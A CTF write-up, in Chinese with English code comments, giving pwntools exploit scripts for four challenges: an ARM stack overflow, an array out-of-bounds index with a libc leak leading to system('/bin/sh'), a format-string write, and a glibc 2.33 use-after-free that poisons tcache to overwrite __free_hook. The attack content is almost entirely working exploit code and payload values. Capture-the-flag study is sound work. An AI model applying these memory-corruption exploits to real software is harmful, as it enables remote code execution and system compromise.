写在前面:

由于这段时间比较忙,本人并未做全部题目,只写了部分,后面的题目有时间会补上的

ez_aarch

一道arm栈溢出,存在后门:

from pwn import *
context.log_level = 'debug'   # pwntools: echo every byte sent and received to the terminal
def pwn():
    """Connect to the remote ez_aarch instance and deliver a single payload.

    Waits for the name prompt, then sends 0x28 filler bytes followed by the
    single byte 0x3c and hands the tube over to the user.  Both the filler
    length and the trailing byte are taken verbatim from the writeup (which
    describes a stack overflow with a backdoor); neither value is derivable
    from this script alone.
    """

    p = remote("node4.buuoj.cn",28172)
    p.recvuntil(b'Please leave your name:')
    p.timeout = 0.5          # shorter default timeout for the reads that follow
    pl1 = b'a'*(0x28) + b'\x3c'
    p.send(pl1)
    p.interactive()
pwn()   # entry point: runs the interaction once when the script is executed

ez_pwn

存在数组越界漏洞,覆盖栈上数字下标变量即可:

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'   # pwntools: echo every byte sent and received
context.arch = 'i386'         # 32-bit target: selects word size/endianness defaults for pwntools helpers
# r = process("./ez_pwn")     # local alternative to the remote tube below
r = remote("node4.buuoj.cn",27674)
e = ELF("./ez_pwn")
# libc as resolved for the local ./ez_pwn binary; the script rebinds `libc`
# further down from LibcSearcher, so this object is only a placeholder here.
libc = e.libc

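# Short aliases over the tube `r` (the usual pwntools template helpers).
se = lambda data :r.send(data)                      # send raw bytes
sa = lambda delim,data :r.sendafter(delim, data)    # wait for delim, then send
sl = lambda data :r.sendline(data)                  # send followed by a newline
# Fixed: pwntools tubes expose sendlineafter(), not slafter(); the original
# alias raised AttributeError when called (it is unused in this script).
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)   # same as sa, kept for compatibility
rc = lambda numb=4096 :r.recv(numb)                 # receive up to numb bytes
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)             # receive through the delimiter (delimiter included)
# Pointer helpers: take the trailing 4/6 bytes of everything received up to
# and including `data`, zero-pad to the word size and unpack little-endian.
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))   # log a labelled hex value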

def dbg(cmd):
    """Attach gdb to the tube `r` with the gdb command string *cmd*, then pause.

    Intended for a local process() tube; this script connects with remote(),
    and every call site below is commented out.
    """
    gdb.attach(r,cmd)
    pause()

def get_sign32(vx):
    """Return *vx* reinterpreted as a signed 32-bit integer.

    Falsy inputs and values below 2**31 are returned unchanged; values from
    2**31 upward are shifted down by 2**32 (so 0xffffffff becomes -1).
    Inputs wider than 32 bits are only shifted, never masked.
    """
    if vx and vx >= 0x80000000:
        return vx - 0x100000000
    return vx

# --- interaction transcript for ez_pwn (all values verbatim from the writeup) ---
# NOTE(review): the paste lost its indentation; each `for` body below is
# restored as the eight lines up to the following blank line.  Confirm this
# against the original script before reusing it.
ru(b'input the length of array:')
sl(b'-4294967297')            # length string from the writeup: -(2**32 + 1)

for i in range(12):
    ru(b'input your choice:')
    sl(b'1')
    ru(b'input num')
    sl(b'100')
    ru(b'input your choice:')
    sl(b'1')
    ru(b'input num')
    sl(b'17')

# Three 32-bit values sent as decimal text (0x80490c0, 0x8049408, 0x804c014);
# the page does not state what they refer to.
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134516928')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134517768')
# dbg('b *0x804933D')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134529044')

# dbg('b *0x804933D')
ru(b'input your choice:')
sl(b'100')
addr = uu32(b'\xf7')          # last 4 bytes up to and including a 0xf7 byte, read as a 32-bit value
print(hex(addr))




# Rebind `libc` from the ELF-derived object to a LibcSearcher lookup keyed on
# the leaked puts address; dump() returns offsets within that candidate libc.
libc = LibcSearcher("puts",addr)
base = addr - libc.dump('puts')
print(hex(base))
sys = base + libc.dump("system")
sh = base + libc.dump("str_bin_sh")
sys = get_sign32(sys)         # presumably the program parses the number as a signed 32-bit int
sh = get_sign32(sh)

# Second round: same prologue as above, then the two computed values are sent
# as decimal text where the fixed constants were sent before.
ru(b'input the length of array:')
sl(b'-4294967297')

for i in range(12):
    ru(b'input your choice:')
    sl(b'1')
    ru(b'input num')
    sl(b'100')
    ru(b'input your choice:')
    sl(b'1')
    ru(b'input num')
    sl(b'17')

ru(b'input your choice:')
sl(b'1')
ru(b'input num')
print(hex(sys))
print(sys)
# dbg('b *0x804933D')

sl(str(sys).encode())
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134517768')


ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(str(sh).encode())

ru(b'input your choice:')
sl(b'100')

r.interactive()

dest_love

bss段格式化字符串,这题出题人没给libc,卡了很久

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'   # pwntools: echo every byte sent and received
# r = process("./pwn")        # local alternative to the remote tube below
r = remote("node4.buuoj.cn",28742)
e = ELF("./pwn")
# libc as resolved for the local ./pwn binary.  NOTE(review): the writeup says
# no libc was provided for this challenge, and `libc` is not used below.
libc = e.libc

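# Short aliases over the tube `r` (the usual pwntools template helpers).
se = lambda data :r.send(data)                      # send raw bytes
sa = lambda delim,data :r.sendafter(delim, data)    # wait for delim, then send
sl = lambda data :r.sendline(data)                  # send followed by a newline
# Fixed: pwntools tubes expose sendlineafter(), not slafter(); the original
# alias raised AttributeError when called (it is unused in this script).
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)   # same as sa, kept for compatibility
rc = lambda numb=4096 :r.recv(numb)                 # receive up to numb bytes
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)             # receive through the delimiter (delimiter included)
# Pointer helpers: take the trailing 4/6 bytes of everything received up to
# and including `data`, zero-pad to the word size and unpack little-endian.
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))   # log a labelled hex value
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))  # log "name = 0x..." at success level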

def dbg(cmd):
    """Attach gdb to the tube `r` with the gdb command string *cmd*, then pause.

    Intended for a local process() tube; this script connects with remote()
    and never calls dbg().
    """
    gdb.attach(r,cmd)
    pause()

# --- interaction transcript for dest_love (all values verbatim from the writeup) ---
ru(b"What about your love to Dest0g3?\n")
se(b'aaa')
ru(b"What about your love to Dest0g3?\n")
se(b'aaa')

#leak
ru(b"What about your love to Dest0g3?\n")
se(b"%12$p%10$p")
# Each rc(14) assumes one %p prints "0x" plus 12 hex digits; the subtracted
# constants are the page's offsets and are not derivable from this script.
text_base = int(rc(14),16) - 0x185 - 0x1000
leak("text_base",text_base)
stack = int(rc(14),16) - 0xd8
leak("stack",stack)
num = stack % 0x10000        # low 16 bits: the width a %hn write covers
print(hex(num))


ru(b"What about your love to Dest0g3?\n")
pl1 = "%{num}c%10$hn".format(num = num)   # str payload; pwntools encodes it on send

se(pl1)
target = text_base + 0x4010
num2 = target % 0x10000      # low 16 bits again, for the second %hn
print(hex(num2))

ru(b"What about your love to Dest0g3?\n")
pl2 = "%{num}c%39$hn".format(num = num2)
se(pl2)

ru(b"What about your love to Dest0g3?\n")
pl3 = "%1314520c%12$n"       # full-width %n write; 1314520 is the page's value

se(pl3)

r.interactive()

ezuaf

很明显的漏洞uaf,但版本是2.33,之前没做过这个版本的,所以搜索了一下相关知识,也是做出来了

from pwn import *
from LibcSearcher import *
# echo 0 > /proc/sys/kernel/randomize_va_space   (author's reminder: disables ASLR for local runs)
local_file = './uaf'
local_libc = './libc-2.33.so'   # libc shipped with the challenge; the symbol offsets used below depend on this exact build
# context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'     # pwntools: echo every byte sent and received
e = ELF(local_file)
context.arch = e.arch           # take the architecture from the binary instead of hard-coding it

# 0 = local process with the bundled libc; anything else = the remote instance.
# NOTE(review): the paste lost its indentation; the if/else bodies are
# restored as the two assignments that follow each branch header.
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29477)
    libc = ELF(local_libc)      # same libc object either way; remote symbol offsets assume the server runs this build

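# Short aliases over the tube `r` (the usual pwntools template helpers).
se = lambda data :r.send(data)                      # send raw bytes
sa = lambda delim,data :r.sendafter(delim, data)    # wait for delim, then send
sl = lambda data :r.sendline(data)                  # send followed by a newline
# Fixed: pwntools tubes expose sendlineafter(), not slafter(); the original
# alias raised AttributeError when called (it is unused in this script).
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)   # same as sa, kept for compatibility
rc = lambda numb=4096 :r.recv(numb)                 # receive up to numb bytes
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)             # receive through the delimiter (delimiter included)
# Pointer helpers: take the trailing 4/6 bytes of everything received up to
# and including `data`, zero-pad to the word size and unpack little-endian.
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))   # log a labelled hex value
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))  # log "name = 0x..." at success level
gadget = [0x4f2c5,0x4f322,0x10a38c]   # NOTE(review): not referenced anywhere in this script
r.timeout = 0.5                       # default timeout for every recv*/recvuntil on the tube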
def dbg(cmd):
    """Attach gdb to the tube `r` with the gdb command string *cmd*, then pause.

    Only meaningful when `select == 0` (local process() tube); never called
    in this script.
    """
    gdb.attach(r,cmd)
    pause()

def add(size,desc):
    """Menu option 1: allocate a chunk of *size* bytes and send *desc* as its content.

    *desc* is sent raw (no trailing newline) with se().
    """
    ru(b': ')
    sl(b'1')
    ru(b'Please tell me its size:')
    sl(str(size).encode())
    ru(b'Content: ')
    se(desc)
def edit(index,desc):
    """Menu option 2: overwrite the content of chunk *index* with *desc*.

    *desc* is sent raw with se(); callers below append their own b'\\n'.
    """
    ru(b': ')
    sl(b'2')
    ru(b'Please tell me the index:')
    sl(str(index).encode())
    ru(b'Please tell me its content:')
    se(desc)
def dele(index):
    """Menu option 3: free chunk *index*.

    The writeup states the binary keeps the dangling pointer (UAF), so the
    same index can still be passed to show()/edit() afterwards.
    """
    ru(b': ')
    sl(b'3')
    ru(b'Please tell me the index:')
    sl(str(index).encode())
def show(index):
    """Menu option 4: ask the program to print the content of chunk *index*.

    Does not read the reply; callers consume it with ru()/uu64() themselves.
    """
    ru(b': ')
    sl(b'4')
    ru(b'Please tell me the index:')
    sl(str(index).encode())

def pwn():
    """Drive the ezuaf menu end to end using the add/edit/dele/show helpers.

    NOTE(review): the paste lost its indentation; both `for` loops are
    restored with single-statement bodies, which is the most plausible
    reading given the fixed-index dele()/show() calls that follow.  Confirm
    against the original script before reusing.  All constants (0x1e0c00,
    0x2d0, 0x170, the chunk sizes) are taken verbatim from the writeup and
    are tied to the challenge's libc-2.33 build.
    """
    for i in range(9):
        add(0x80,b'/bin/sh\x00\x00'*2)
    dele(0)
    show(0)
    he0=uu64(b'\x00')            # 6 trailing bytes of the reply up to the first NUL
    print(hex(he0))
    dele(1)
    show(1)
    he1=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))   # same idea, 7 trailing bytes
    print(hex(he1))
    heap=he0^he1                 # XOR of the two leaked qwords
    leak("heap",heap)

    for i in range(2,8):
        dele(i)
    show(5)
    he=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))
    print(hex(he))
    show(6)
    he6=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))
    print(hex(he6))
    show(7)
    base=uu64(b'\x7f')-0x1e0c00  # 6 bytes ending in 0x7f, minus the page's offset
    leak("base",base)
    free_hook=base+libc.sym["__free_hook"]
    leak("free_hook",free_hook)
    sys=base+libc.sym['system']
    leak("sys",sys)

    add(128,b'aa')
    tagerheap=heap+0x2d0
    leak("target heap:",tagerheap)
    tagerheap_key=tagerheap^he
    leak("target heap_key:",tagerheap_key)
    libc_key=tagerheap_key+0x170
    leak("target libc_key:",libc_key)
    fd = free_hook^libc_key

    dele(6)
    edit(9,p64(fd)+b'\n')
    leak("free_hook",free_hook)
    add(128,b'/bin/sh\x00')
    add(128,b'/bin/sh\x00')
    edit(11,p64(sys)+b'\n')

    dele(6)

    r.interactive()



pwn()   # entry point: runs the interaction once when the script is executed